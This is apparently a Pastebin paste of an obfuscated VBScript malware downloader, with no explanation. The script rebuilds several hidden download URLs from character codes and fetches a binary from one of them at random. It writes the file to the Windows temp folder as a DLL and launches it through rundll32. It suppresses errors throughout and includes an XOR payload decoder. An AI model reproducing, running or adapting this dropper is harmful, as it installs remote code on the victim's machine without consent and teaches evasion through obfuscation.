Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- On Error Resume Next
- Const Lb8 = 1, DFm = 2, SUo8 = 8
- Const GUc = 1, Yp = 2, TLy = 2
- Const Hp0 = "437"
- Function VKr1(Mo)
- Dim HAq8(255), QXn5, OJj2
- HAq8(128)=199
- HAq8(129)=252
- HAq8(130)=233
- HAq8(131)=226
- HAq8(132)=228
- HAq8(133)=224
- HAq8(134)=229
- HAq8(135)=231
- HAq8(136)=234
- HAq8(137)=235
- HAq8(138)=232
- HAq8(139)=239
- HAq8(140)=238
- HAq8(141)=236
- HAq8(142)=196
- HAq8(143)=197
- HAq8(144)=201
- HAq8(145)=230
- HAq8(146)=198
- HAq8(147)=244
- HAq8(148)=246
- HAq8(149)=242
- HAq8(150)=251
- HAq8(151)=249
- HAq8(152)=255
- HAq8(153)=214
- HAq8(154)=220
- HAq8(155)=162
- HAq8(156)=163
- HAq8(157)=165
- HAq8(158)=8359
- HAq8(159)=402
- HAq8(160)=225
- HAq8(161)=237
- HAq8(162)=243
- HAq8(163)=250
- HAq8(164)=241
- HAq8(165)=209
- HAq8(166)=170
- HAq8(167)=186
- HAq8(168)=191
- HAq8(169)=8976
- HAq8(170)=172
- HAq8(171)=189
- HAq8(172)=188
- HAq8(173)=161
- HAq8(174)=171
- HAq8(175)=187
- HAq8(176)=9617
- HAq8(177)=9618
- HAq8(178)=9619
- HAq8(179)=9474
- HAq8(180)=9508
- HAq8(181)=9569
- HAq8(182)=9570
- HAq8(183)=9558
- HAq8(184)=9557
- HAq8(185)=9571
- HAq8(186)=9553
- HAq8(187)=9559
- HAq8(188)=9565
- HAq8(189)=9564
- HAq8(190)=9563
- HAq8(191)=9488
- HAq8(192)=9492
- HAq8(193)=9524
- HAq8(194)=9516
- HAq8(195)=9500
- HAq8(196)=9472
- HAq8(197)=9532
- HAq8(198)=9566
- HAq8(199)=9567
- HAq8(200)=9562
- HAq8(201)=9556
- HAq8(202)=9577
- HAq8(203)=9574
- HAq8(204)=9568
- HAq8(205)=9552
- HAq8(206)=9580
- HAq8(207)=9575
- HAq8(208)=9576
- HAq8(209)=9572
- HAq8(210)=9573
- HAq8(211)=9561
- HAq8(212)=9560
- HAq8(213)=9554
- HAq8(214)=9555
- HAq8(215)=9579
- HAq8(216)=9578
- HAq8(217)=9496
- HAq8(218)=9484
- HAq8(219)=9608
- HAq8(220)=9604
- HAq8(221)=9612
- HAq8(222)=9616
- HAq8(223)=9600
- HAq8(224)=945
- HAq8(225)=223
- HAq8(226)=915
- HAq8(227)=960
- HAq8(228)=931
- HAq8(229)=963
- HAq8(230)=181
- HAq8(231)=964
- HAq8(232)=934
- HAq8(233)=920
- HAq8(234)=937
- HAq8(235)=948
- HAq8(236)=8734
- HAq8(237)=966
- HAq8(238)=949
- HAq8(239)=8745
- HAq8(240)=8801
- HAq8(241)=177
- HAq8(242)=8805
- HAq8(243)=8804
- HAq8(244)=8992
- HAq8(245)=8993
- HAq8(246)=247
- HAq8(247)=8776
- HAq8(248)=176
- HAq8(249)=8729
- HAq8(250)=183
- HAq8(251)=8730
- HAq8(252)=8319
- HAq8(253)=178
- HAq8(254)=9632
- HAq8(255)=160
- s = ""
- For OJj2 = 0 To UBound(Mo)
- If Mo(OJj2) < 0 Or Mo(OJj2) > 255 Then
- Err.Raise 50003, "", "a2s()", "", 0
- ElseIf Mo(OJj2) >= 128 Then
- QXn5 = QXn5 & ChrW(HAq8(Mo(OJj2)))
- Else
- QXn5 = QXn5 & ChrW(Mo(OJj2))
- End If
- Next
- VKr1 = QXn5
- End Function
- Function Pp3(ISj)
- Dim Gg0, TMr3, QXn5
- Set Gg0 = CreateObject("ADODB.Stream")
- Gg0.type = Yp
- Gg0.Charset = Hp0
- Gg0.Open
- Gg0.LoadFromFile ISj
- QXn5 = Gg0.ReadText
- Gg0.Close
- Pp3 = SOk8(QXn5)
- End Function
- Sub XTk(ISj, Mo)
- Dim Gg0, QXn5
- Set Gg0 = CreateObject("ADODB.Stream")
- Gg0.type = Yp
- Gg0.Charset = Hp0
- Gg0.Open
- QXn5 = VKr1(Mo)
- Gg0.WriteText QXn5
- Gg0.SaveToFile ISj, TLy
- Gg0.Close
- End Sub
- Function IQm(Ks)
- Dim QXn5, No(0)
- If Ks <= 0 Then
- Err.Raise 50001, "", "makearrr()", "", 0
- ElseIf Ks = 1 Then
- IQm = No
- Else
- QXn5 = Space(Ks-1)
- IQm = Split(QXn5, " ")
- End If
- End Function
- Function MCf7(url)
- Dim Kf1, Gs, TMr3, OJj2
- Dim KCq, Aq9(1)
- Set Kf1 = CreateObject("Scripting.FileSystemObject")
- Aq9(0) = "WinHttp.WinHttpRequest.5.1"
- Aq9(1) = "MSXML2.XMLHTTP"
- For Each KCq in Aq9
- Err.Clear
- Set Gs = CreateObject(KCq)
- If Err.Number = 0 Then
- Exit For
- End If
- Next
- Gs.Open "GET", url, False
- Gs.Send
- TMr3 = IQm(LenB(Gs.ResponseBody))
- For OJj2 = 1 To LenB(Gs.ResponseBody)
- TMr3(OJj2-1) = AscB(MidB(Gs.ResponseBody, OJj2, 1))
- Next
- MCf7 = TMr3
- End Function
- Function UPx6()
- Dim Ov8, ESx, VBd1
- Set Ov8 = CreateObject("WScript.Shell")
- Set ESx = Ov8.Environment("System")
- VBd1 = ESx("PROCESSOR_ARCHITECTURE")
- If LCase(VBd1) = "amd64" Then
- UPx6 = Ov8.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
- Else
- UPx6 = Ov8.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
- End If
- End Function
- Sub Ye3(VPs, FZb1, Ta7)
- Dim Ov8, Kf1, Rp3, Zb0, Bn2
- Set Ov8 = CreateObject("WScript.Shell")
- Set Kf1 = CreateObject("Scripting.FileSystemObject")
- Set Rp3 = Kf1.GetFile(VPs)
- Zb0 = Rp3.ShortPath
- Bn2 = UPx6() + " " + Zb0 + "," + FZb1 + " " + Ta7
- If 2 > 1 Then
- Ov8.Run(Bn2)
- End If
- End Sub
- Function DAk9(VPs)
- Dim Kf1
- Set Kf1 = CreateObject("Scripting.FileSystemObject")
- DAk9 = Kf1.FileExists(VPs)
- End Function
- Function MWp(VPs)
- Dim Kf1, Rp3
- Set Kf1 = CreateObject("Scripting.FileSystemObject")
- Set Rp3 = Kf1.GetFile(VPs)
- MWp = Rp3.ShortPath
- End Function
- Function Ff3(Bg, Mq7)
- Dim Ks
- Ks = CDbl(Int(CDbl(Bg)/CDbl(Mq7)))
- Ff3 = CDbl(Bg) - Ks * CDbl(Mq7)
- End Function
- Function MIv4(IUj, QXn5)
- QXn5(0) = 171 * QXn5(0) Mod 30269
- QXn5(1) = 172 * QXn5(1) Mod 30307
- QXn5(2) = 170 * QXn5(2) Mod 30323
- Dim SOz3
- SOz3 = Ff3((CDbl(QXn5(0))/30269.0 + CDbl(QXn5(1))/30307.0 + CDbl(QXn5(2))/30323.0), 1.0)
- MIv4 = Int(SOz3 * CDbl(IUj))
- End Function
- Function Kz5(TMr3, CLn)
- Dim Yr(2), DLs6, BVp, Pa0, OJj2
- If UBound(TMr3) < 3 Then
- Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
- End If
- DLs6 = IQm(UBound(TMr3) - 3)
- Yr(0) = CLn(0)
- Yr(1) = CLn(1)
- Yr(2) = CLn(2)
- For OJj2 = 0 To UBound(TMr3)
- TMr3(OJj2) = TMr3(OJj2) Xor MIv4(256, Yr)
- Next
- BVp = TMr3(UBound(TMr3)-3)+(TMr3(UBound(TMr3)-2)*256)+(TMr3(UBound(TMr3)-1)*256*256)+(TMr3(UBound(TMr3))*256*256*256)
- Pa0 = ZBk2
- For OJj2 = 0 To UBound(DLs6)
- DLs6(OJj2) = TMr3(OJj2)
- Pa0 = (Pa0 + TMr3(OJj2)) Mod 1000000000
- Next
- If Pa0 <> BVp Then
- Err.Raise 50005, "", "checksum error", "", 0
- End If
- Kz5 = DLs6
- End Function
- Function LLq(Ke4)
- LLq = CInt(Ke4*Rnd())
- End Function
- Sub RTr1(Dc)
- WScript.Sleep(Dc)
- End Sub
- Randomize
- Dim WAz(2), ZBk2, YAz(4), ISj
- WAz(0) = 25482
- WAz(1) = 2072
- WAz(2) = 22148
- ZBk2 = 32
- YAz(0)=cHr(104) & cHr(116) + cHr(116) & cHr(112) + cHr(58) + cHr(47) + cHr(47) + cHr(97) + "c" + cHr(116) & cHr(105) + cHr(111) & cHr(110) & cHr(111) & cHr(110) + cHr(115) & "p" & cHr(111) + cHr(114) + cHr(116) & cHr(115) + cHr(46) & cHr(99) + cHr(111) & cHr(109) & cHr(47) + cHr(107) + cHr(113) + "0" + cHr(117) + "9" + "3" & cHr(97) + cHr(49)
- YAz(1)=cHr(104) + "t" + cHr(116) & "p" + cHr(58) + "/" & cHr(47) + cHr(100) & cHr(109) & cHr(116) & cHr(121) & cHr(97) + cHr(46) + cHr(114) + "u" + cHr(47) + cHr(109) + cHr(112) & "o" + "z" + cHr(99) & "e" + cHr(117)
- YAz(2)="h" & cHr(116) + cHr(116) & "p" + cHr(58) + "/" + cHr(47) + cHr(99) + "a" & cHr(108) & cHr(108) + cHr(105) & cHr(100) + "e" & "o" & cHr(46) + cHr(102) + cHr(114) & cHr(47) & "m" + cHr(115) + "n" + "9" & "a" + cHr(114)
- YAz(3)=cHr(104) & cHr(116) & cHr(116) & cHr(112) + cHr(58) & cHr(47) + cHr(47) & cHr(102) & cHr(108) & cHr(117) & cHr(116) + cHr(121) & "g" & "o" & cHr(121) + cHr(46) & cHr(110) & cHr(101) + cHr(116) + cHr(47) & cHr(56) + cHr(50) & cHr(111) + cHr(107) + "z" + cHr(122) + cHr(107) & cHr(113)
- YAz(4)=cHr(104) + cHr(116) + "t" + "p" & cHr(58) & cHr(47) + "/" + cHr(116) + "h" + "e" + cHr(97) + cHr(116) + cHr(111) + "s" + cHr(99) + cHr(46) & cHr(110) + cHr(101) & cHr(116) + cHr(47) + cHr(56) + cHr(106) + cHr(51) & cHr(119) & cHr(109)
- ISj = "e134dkdCXFS"
- Dim Ov8, Yl8, TKh, Rd
- Set objShell = CreateObject("WScript.Shell")
- Yl8 = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
- TKh = Yl8 & "\" & ISj & ".dll"
- Dim VZx1, EYi7, Bd, Hp, OJj2
- EYi7 = False
- For OJj2=0 To 10: Do
- If DAk9(TKh) Then
- Rd = MWp(TKh) & ".txt"
- If DAk9(Rd) Then
- WScript.Quit(0)
- End If
- End If
- If Not EYi7 Then
- VZx1 = LLq(UBound(YAz))
- Bd = MCf7(YAz(VZx1))
- If Err.Number <> 0 Then
- Exit Do
- End If
- Hp = Bd ' Kz5(Bd, WAz)
- If Err.Number <> 0 Then
- Exit Do
- End If
- XTk TKh, Hp
- If Err.Number <> 0 Then
- Exit Do
- End If
- EYi7 = True
- End If
- Ye3 TKh, "EnhancedStoragePasswordConfig", "147"
- RTr1 24999
- Loop While False: Next
- If 2=2 Then
- WScript.Quit(1)
- End If
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement